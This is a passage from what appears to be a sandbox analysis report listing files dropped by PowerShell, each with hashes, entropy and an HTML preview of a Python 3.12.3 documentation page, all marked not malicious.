                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):36448
                              Entropy (8bit):5.0149508298625145
                              Encrypted:false
                              SSDEEP:384:FHtxlVcMdwTXmYg/awT0n+OMNTIT6ou9EqTSTqT7wgT8TF+Uzeff/DBndfCuKwa3:VtPaMKwY04xw/KYlHftkMa764N
                              MD5:33D3EA53A52412B5DB8E6637A93A31AF
                              SHA1:B5DD45FEB0B6A89898A280811DC5D59B608305FF
                              SHA-256:CBF2CFDF9F572CCB7B78897B4DA22A6A322D65F6B44AFC4FAC5E1C78A448ACCE
                              SHA-512:27738F90D7638469A04040B5A82F28CC7B1F8D88E25DF9791EA3A4D14A1F24292BD208F8E1F9992F364BD89C2BE08EFDA925A9111AC3CB2CC436F73F5EE3A468
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22835
                              Entropy (8bit):5.185256807156061
                              Encrypted:false
                              SSDEEP:384:yHtxlVcMwTPTuTTjTjT6xSoMzM7f5ldFn/T6KmOMfjJraFc+cYwqeo80yo4jIIi3:GtPaM/Pa6EMa764N
                              MD5:5002B6BA596B121684C9D444469719A6
                              SHA1:A207892A6F62862172EBF1045FC0D602134AE87C
                              SHA-256:F4D307300F2AC1121391CC1965DEC264EFE40A959A2B311B6E3D9AFC6251B6E0
                              SHA-512:FF4818EC72CBC04CE075A32CAEEB717B96A3338BA9817AB0D5C3E213351F136FE6FBC6EAAE668A298B144D4EEE72363EF516CB5A711F0A10DC66992DE526B5CB
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):11707
                              Entropy (8bit):4.87745963096035
                              Encrypted:false
                              SSDEEP:192:zUpUHtxX1vjNrcMGr6dbtfAqUdtUfXk/MaUA53TWIXPU0LkcMGrZ76dqEC:vHtxlVcMt1t4qUdtUfXk/MaUA5DWIXPt
                              MD5:873B9EA3E0E9ED5CD2C76A9EB9C9B4A5
                              SHA1:E33023498FE9B144CFACABBA39CCD5F6C6B30C7B
                              SHA-256:9C9D4F47D9713A4BD19E1CCCDDB7FDE766BBB81F60C57E8040F1A73B7C43F3D1
                              SHA-512:8B76564B61340FF07C78F24A1C4BF06F0690F556C684B485CF44CC569E4AF721E97C3288E3E535CDA4E60FEC20CB1A56C366BD114773B38B478D424349EAF512
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):14156
                              Entropy (8bit):4.89505341238138
                              Encrypted:false
                              SSDEEP:384:UHtxlVcMDAxrvMQUTzwnU4cypygmoBdlBtEFLG0WM3rrrrqBWJrvJK1/c2bLvJAu:YtPaM81cD07Ma764N
                              MD5:FFF621E3AB8D5A79EC16CD7670DDBAC9
                              SHA1:022EEE64968E2865A3F219AC470F60A969BB7CCB
                              SHA-256:C2272E4FA226303F4C88EAF10D3CA9B6AE1409C19CD59E125C60C7A68BC2325E
                              SHA-512:B09ADCBA09C159624DE16240B32401A62B76EDA851311BB3136045077856E535DEE98B23211B2BB72AF4CB58CCA936367C81C8457E571CB6B1CCC787C2FE12AE
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (521), with CRLF line terminators
                              Category:dropped
                              Size (bytes):62949
                              Entropy (8bit):4.9403040035502
                              Encrypted:false
                              SSDEEP:384:9HtxlVcM1btxV3BctBwFXnHnnPbPU/y1vrFPhnjkyjBM97RIEi0y8E8XvvHXhiQM:ttPaM7G3vbk2ppm/x32+Zrl2SMa764N
                              MD5:ED43EF4115A96A7EB28A5865951F8397
                              SHA1:D6C4CC3DB20DB5A5035DA0EF57FF16C1449CFAE0
                              SHA-256:D0F0388FBACDE91BE4BB3344164930C8E1FD79B6F4E1F2970F94362D0C353690
                              SHA-512:8E3FAD54CA59517ACBB44B6EA9173324D4045D058276934C91BCD528E628D5CCFE4E55BC61EB07356FE6FF2CC8265C6426F38C5E36848B9FAC15E6E79FA8FB67
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (485), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1783650
                              Entropy (8bit):5.123361387624057
                              Encrypted:false
                              SSDEEP:12288:dUDo6elkPFAkwiXdzE8qEt8XJ9RYmLU/gS58mVK0k9FL1PGlN5CuRW+aHgh5ANvj:UFpx5CujAs1ENEor
                              MD5:94856BD9FB4AB432150E8C57E412BEB1
                              SHA1:1D9A96B093613BA261455814C4559487120D6305
                              SHA-256:B7C5E825A619824659427A5AAC0D7D046D52FD2C1472E6829A4C000040873DD1
                              SHA-512:295C39C2B5DC6C802E7F34288AE02170968CFC4639E10602693541C966EB54AF5A31B2EB0D1C076201111EC08D7095BD53232FF54D61994A0C4FA0FC01758670
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):10901
                              Entropy (8bit):4.825159525607657
                              Encrypted:false
                              SSDEEP:192:6sbUHtxX1vjVrcMGryzooD00ExWI0Eh2wEUg4kUoQ0kg2P0k4O8cMGrZ76dqEC:8HtxldcMvs3QcMa76dqEC
                              MD5:5C4AEE04E448472084418A3F6E691933
                              SHA1:37B8DDBAEFF2F93AFE14A3D1EEDCC4D4DCE1FD15
                              SHA-256:7055414F7C3BEE2416A1863E3E0E04FB35B73A7E299EB0B908EDDFBAF55C135D
                              SHA-512:17A858E613A0353284B99FE9A74CB685FD892A2239400F8CB322C1A67B099DA5E3B328BFBFC02B77FA8ED236AE79CEB77B79F7BB2205DAEE408CCBC27F112E78
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (612), with CRLF line terminators
                              Category:dropped
                              Size (bytes):161309
                              Entropy (8bit):4.828975437974827
                              Encrypted:false
                              SSDEEP:1536:UtPpMLzfsqLmMMibYOyqk/pvQtf3PTM29aqc5UuJFJsQVonuzuaSYtgl/m0WdAcq:wq6MMibYHSrSOkf1vg
                              MD5:3C93D2E778E62F302F5F524C8CDDC772
                              SHA1:DE5E96BA25A8B163B4E5C6261275E1D979DD9CDA
                              SHA-256:C34FBE79A66204404D1FF0085649A287232C6D0FB0F5B29851030C150CBD7A97
                              SHA-512:8AA89F6C52BF029696E9EDA9DAEC591B7E2E58D7C0AE2CB64779D783839134834687EAA066B39A4119349FE408BDBDC85AADE04B4CEB57C4BF7956B54813893F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Glossary" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/glossary.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=">>>, The default Python prompt of the interactive shell. Often seen for code examples which can be executed interactively in the interpreter.,,..., Can refer to:- The default Python prompt of the i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=">>>, The default Python prompt of the interactive shell. Often seen for code exa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (454), with CRLF line terminators
                              Category:dropped
                              Size (bytes):37124
                              Entropy (8bit):4.862143581978915
                              Encrypted:false
                              SSDEEP:384:xwHqklGVfnLTM/0fbcfnWiZAA4QuyGxBhqHluN7kAZnHTMC76dqEC:qqyGJvM/Oi/Z4yoxk0zMC764N
                              MD5:6042FA6878C9CBB430D2CA5DF9C2B814
                              SHA1:3843D8CB54981995D4B8388FF8EF4F4133D81C05
                              SHA-256:165D5B9D347072C615B493F2FAF7C528B47FDC1222028CA966B08817F1F8BF1F
                              SHA-512:7B3A3D099A109E0DF7B21E1DBB4B39F7BAB9E0DA375CE732BCD8216C1C42DA533D2CA34269CA6BB2C45A770A6466D3DD9C96C5A5D4978228A149F66774501462
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Annotations Best Practices" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/annotations.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Larry Hastings,. Abstract: This document is designed to encapsulate the best practices for working with annotations dicts. If you write Python code that examines__annotations__ on Python ob..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Larry Hastings,. Abstract: This document is
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (579), with CRLF line terminators
                              Category:dropped
                              Size (bytes):102436
                              Entropy (8bit):4.7397797631413425
                              Encrypted:false
                              SSDEEP:1536:pqyh9MPUW+JFIEuSk0mECVrtJDtt9U/R9ctKuOF7d8qse1aeg5C8TBouMF764N:YoI3r7tg
                              MD5:E05550F1784A25A186CE6F4018AC7840
                              SHA1:A7B4E900F42FAEF10AA866C3058C53835632BB5A
                              SHA-256:BFF5208DE524D7585F86F50BC761BE95B49A150370CA67CBFDA614C25B8D6B57
                              SHA-512:25BDF11EAC5AEC4292BD0794F5BE11A3A5AB5DCD9B9806F681E72C2EC5ABFFE7AFFAD6BE1E78C701E803C102F35E6D129F810E7DC8B09285D3ECB03AFFA385F0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Argparse Tutorial" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/argparse.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="author, Tshepang Mbambo,. This tutorial is intended to be a gentle introduction to argparse, the recommended command-line parsing module in the Python standard library. Concepts: Let.s show the sor..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="author, Tshepang Mbambo,. This tutorial is intended to be a ge
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):10951
                              Entropy (8bit):4.8336299311761435
                              Encrypted:false
                              SSDEEP:192:WPrgKHqkX1vOMBMgTMbfQM16TMbfA76dqEC:sHqkl/pTMR0TMM76dqEC
                              MD5:D7B33215381315CC84E0FC581D4FF7AD
                              SHA1:65865A59AF055F117060A55CD965780548CE5BA9
                              SHA-256:25B78399A2EEC69C90F03D449BC12E1EE69713BBAEE0F0ACD229DC01464101F3
                              SHA-512:4394728EBE0FC5F147C73476D5A8A938D8F879E139D41EB17E96B0E1144538137B548570061231A2BF24F888E43EF2E226F4F49EEFBB40709A43EC2C2AB71DA9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Argument Clinic How-To" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/clinic.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Argument Clinic How-To &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):13914
                              Entropy (8bit):4.838866586671485
                              Encrypted:false
                              SSDEEP:384:aKGGHqkluTECncTMdiIcE+EWnyTM/76dqEC:maqyugCyMd1NWAM/764N
                              MD5:B4D26B754F7A4370B6DCA082F7718D80
                              SHA1:4F2C1B82C43A402290C4D3877F092A9D8ECAD9AB
                              SHA-256:1F362951B08A3D47915F3A054CD901462F8E6026783DDEF67E8719E6B6FC3F8D
                              SHA-512:8B7DEA50437EF9D449AA017A4FD7340AAA1008EA82CE5B967BB9EB5B2B0E4F8E5DB04FA17DED750F0F265FC85339F5390D64999C0D7BE609565375971026E968
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Porting Extension Modules to Python 3" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/cporting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="We recommend the following resources for porting extension modules to Python 3: The Migrating C extensions chapter from Supporting Python 3: An in-depth guide, a book on moving from Python 2 to Pyt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="We recommend the following resources for por
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (635), with CRLF line terminators
                              Category:dropped
                              Size (bytes):68069
                              Entropy (8bit):4.879338503979481
                              Encrypted:false
                              SSDEEP:1536:DqyaMUhWfoI0XnU+Vw/yuCLiUfCOoMY764N:MQfRtQng
                              MD5:F2FF388E17F0F3D7ABBF9C80DB03B430
                              SHA1:7490234A5370CDD1E4F41CE3A524719B1D6678DB
                              SHA-256:A23CB8CD19CB648F332F21910CAFBCC3E06DC156E2FFCBD79E67B5270AA7C860
                              SHA-512:15608D5EE16B026FAC0E0E6605812D6D2EF62CBABCE05B0536D0B70C331AAA20024AD4E35FEDBF5837DB6816AE627751C71A09FD6AEC352E6BCB3277842F7895
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Curses Programming with Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/curses.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling, Eric S. Raymond,, Release, 2.04,. Abstract: This document describes how to use the curses extension module to control text-mode displays. What is curses?: The curses library ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling, Eric S. Raymond,, Release, 2.0
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (612), with CRLF line terminators
                              Category:dropped
                              Size (bytes):171618
                              Entropy (8bit):4.737458968163519
                              Encrypted:false
                              SSDEEP:1536:KqyCMyN7jp/fCxOTpD2sbsVGB5HgAoffCl7CGyRKsZ2cQeLlHS3mr2YG1ll0++r7:LN7jpFb5Hx7lJCboKtb+g
                              MD5:CA1408B9162C432DF1D8E9DBB0619835
                              SHA1:CA8C9E9E6FD4225CCC96F4384658EC7F1E8B6367
                              SHA-256:508D0F3A6A12C8AE2C41DE99DFF338851D7572D9232B455A0B812CE063C7BE83
                              SHA-512:8C67CBC7E99B28D5843D06EED3CA51930E1F5C2587285294739257F4F674E7D69B406B5B80988F4EC0066A9C1122D0DC79483F4407DFD43F3626FCE00B8DA89D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Descriptor Guide" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/descriptor.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Raymond Hettinger,, Contact,<python at rcn dot com>,. Contents: Descriptor Guide- Primer- Simple example: A descriptor that returns a constant, Dynamic lookups, Managed attributes, Customiz..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Raymond Hettinger,, Contact,<python at rcn dot com>,. C
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (657), with CRLF line terminators
                              Category:dropped
                              Size (bytes):188769
                              Entropy (8bit):4.839483370960123
                              Encrypted:false
                              SSDEEP:1536:RGKqyJMx2eu2bF/D/xpcQ/L2ZoVph7PMjDscBnZuLL/HeRCi1NMxxtiQz46I3EMj:kV9a3cVrLQ3RQdftJg
                              MD5:A7DE71E2A40C7F5D98A075DD7B4CAD54
                              SHA1:9E10D1ADB3EDF185AD097DDFE489063175E3198D
                              SHA-256:749633B6B13175EDC86793D1A4BE4A09FFC4F950D44E2A1C2188C76BF0C08182
                              SHA-512:09B525F2A7CFC3544D8875C970EB5C51EDB35D6FEA4B63A5CB79111FFBF328B183BD0BC11ED3D4686F492CE9DC54EA14B80FDB35F86CF2398AAD291F5A8576B8
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Enum HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/enum.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An Enum is a set of symbolic names bound to unique values. They are similar to global variables, but they offer a more useful repr(), grouping, type-safety, and a few other features. They are most ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An Enum is a set of symbolic names bound to unique values. They are similar
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (866), with CRLF line terminators
                              Category:dropped
                              Size (bytes):168321
                              Entropy (8bit):4.7744869560811365
                              Encrypted:false
                              SSDEEP:1536:Eqybb9yMSkbLAMQDJAW4p4henyaipdMdGmitOJQCvzkuAH1Au1k1jmYwyoJJjkSt:Wb9eDJt4p4z1m1Ts+VHb9zg
                              MD5:9097D2CDD5B8ABF21831F29726FB7065
                              SHA1:6B9EE82EF7C426642F511DAB79723B79A1626793
                              SHA-256:3D2336AFE8D6F89F64DBD2EA29503B7E9F88320352084F13068D21537A1A121F
                              SHA-512:9C6AAA561BD12994EA37046BB65D6274F012EEDAC2BA593D1CB3FD08525D1B86F40888E2F5EA55A33418BB77C275EC33116A528D7F038DEA072A1999DCDB9449
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Functional Programming HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/functional.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A. M. Kuchling,, Release, 0.32,. In this document, we.ll take a tour of Python.s features suitable for implementing programs in a functional style. After an introduction to the concepts of ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A. M. Kuchling,, Release, 0.32,. In thi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1180), with CRLF line terminators
                              Category:dropped
                              Size (bytes):50189
                              Entropy (8bit):5.186184683821385
                              Encrypted:false
                              SSDEEP:1536:hqy83M37UXbYGqE+H3lgcZTLilrTMRGDx3xuX4MC764N:wHbff4XNg
                              MD5:7325368A42F829C74B017BF59C346DC3
                              SHA1:470FCF3AFD7C8B5759660B90C5739398659C0716
                              SHA-256:FD9035AEAEC42D7ABD44558A8B92C3BD0B629D861D16C1F30ED380190B33A602
                              SHA-512:925B4491A5029BDA286A5E229B0F93DA93741739E44351295A34FC0A5DD67573156F705416029E4301DC5F66B15A21AAD8AF964B75369C3F6121D70BB2D125CB
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Debugging C API extensions and CPython Internals with GDB" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/gdb_helpers.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This document explains how the Python GDB extension, python-gdb.py, can be used with the GDB debugger to debug CPython extensions and the CPython interpreter itself. When debugging low-level proble..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This document explain
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15307
                              Entropy (8bit):4.860974388621738
                              Encrypted:false
                              SSDEEP:384:3+6+lHqklbXLn/TMh+2MRBiNnbTMt76dqEC:Oz1qyb77M0F2/Mt764N
                              MD5:B9F8B698ED005211EB609F482BC2219B
                              SHA1:49872382D72BDF490133DFE86BA3DB5C4C50739F
                              SHA-256:8179A879C08389F47A8FA799FB144230997FAE4826705E2A370540D5E6D30742
